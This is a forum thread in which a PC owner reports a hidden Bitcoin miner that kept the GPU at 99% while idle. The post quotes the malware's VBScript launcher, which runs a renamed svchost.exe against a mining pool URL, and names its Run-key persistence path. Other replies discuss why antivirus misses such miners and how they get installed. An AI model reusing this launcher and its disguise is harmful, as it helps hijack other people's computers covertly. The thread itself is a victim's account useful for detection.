• Competitor rules

    Please remember that any mention of competitors, hinting at competitors or offering to provide details of competitors will result in an account suspension. The full rules can be found under the 'Terms and Rules' link in the bottom right corner of your screen. Just don't mention competitors in any way, shape or form and you'll be OK.

99% GPU usage

fs123

fs123

fs123

Soldato
Joined
4 Feb 2006
Posts
3,418
Yesterday I noticed that my gpu fan was running quite loud and when I checked MSI afterburner the GPU usage was nearly 99% constant under no load. Re-installed older drivers and the problem was still there.

Eventually discovered that an svchost.exe process was the culprit but Avast and malwarebytes found nothing. Checked the registry under all the Run entries in HKEY_USERS\xxxxxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Run and found an entry for a file called WinINIT.vbs located in a directory called C:\Users\Public\Data. The entry title was RPClocater or something like that.

I looked in this Data directory and found quite a few files including the offending svchost.exe.

The WinINIT.vbs was a script that loads the svchost.exe and was actually a bitcoin farming tool.


Here's what was in the vbs script:

"Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "cmd /c cd c:\Users\Public\Data\ & svchost.exe -d 0 -v -w 128 -f 350 http://drpepper6969_tmb:[email protected]:3333", 0 "

I removed all the files and so far it seems the problem is gone. Does anyone know how I could have got this malware and why no virus programs can detect it?
 
Last edited:
:confused: Having 99% GPU usage is actually ideal, it means your graphic card is not being bottlenecked by the CPU. However, if you are using a 60Hz monitor and your frame rate is hitting way above 60fps, you might wanna cap your frame rate at 60fps, so the graphic card will not render beyond the 60fps which your monitor is capable of, thus lowering GPU usage, heat and temp.

...unless you mean it is stucked at 99% GPU usage, even when it is not under load...
 
Some virus checkers will detect it but there are legitimate uses for BitCoin mining software (like mining BitCoins) so most don't pick it up as malware.

It looks like you killed it though.
 
Marine-RX179 said:
:confused: Having 99% GPU usage is actually ideal, it means your graphic card is not being bottlenecked by the CPU. However, if you are using a 60Hz monitor and your frame rate is hitting way above 60fps, you might wanna cap your frame rate at 60fps, so the graphic card will not render beyond the 60fps which your monitor is capable of, thus lowering GPU usage, heat and temp.

...unless you mean it is stucked at 99% GPU usage, even when it is not under load...
Click to expand...

That last but.
 
I've seen a few of these - bitcoin miners disguised as something else. Virus scanners don't pick it up because it is a legitimate bitcoin program, just renamed and hidden away. You might get it picked up if your virus scanner queries the installation (especially if it installs java).

It's going to be a driveby download due to a browser loophole, or something sneaked into a legitimate program install. You would okay the program install, and the bitcoin miner would go in with it.

Usually it's easy to spot the process running, so you would just remove the exe, all the program directories, and entries in the startup.
 
I had a bitcoin malware process disguise itself as a windows time utility. It installed itself to the same place. C:\Users\Public\Data

It took no time to source and remove thankfully.
 
To be honest you really do need to be an idiot not to notice your GPU is running very slow all of a sudden. Anyone who purchases a GPU for gaming will know almost instantly when they have a bitcoin malware hack running. Even if you aren't a gamer your GPU fan is running much, much louder even at the desktop.

The bitcoin malware hacks will literally make your GPU crawl in games. With a single HD 7950 @1200/1700 I had Tomb Raider drop to mid teens on FPS when it is usually in mid 40s.

A quick check in MSI Afterburner or GPU-Z showed my GPU utilisation at 99% even at the desktop.

As long as you are even reasonably paying attention you will see it instantly.
 
Last edited:
ICDP said:
To be honest you really do need to be an idiot not to notice your GPU is running very slow all of a sudden. Anyone who purchases a GPU for gaming will know almost instantly when they have a bitcoin malware hack running. Even if you aren't a gamer your GPU fan is running much, much louder even at the desktop.

The bitcoin malware hacks will literally make your GPU crawl in games. With a single HD 7950 @1200/1700 I had Tomb Raider drop to mid teens on FPS when it is usually in mid 40s.

A quick check in MSI Afterburner or GPU-Z showed my GPU utilisation at 99% even at the desktop.

As long as you are even reasonably paying attention you will see it instantly.
Click to expand...

You are absolutely correct but the only game I have installed and have been playing for the past few weeks is League of Legends which doesn't use much of my gpu's power at all. I haven't got any other games installed yet because I bought a new ssd recently and did a fresh install. This rules out any pirate software as a source.

My kid does play a lot of flash games though so that could be a possibility...
 
You must log in or register to reply here.
Back
Top Bottom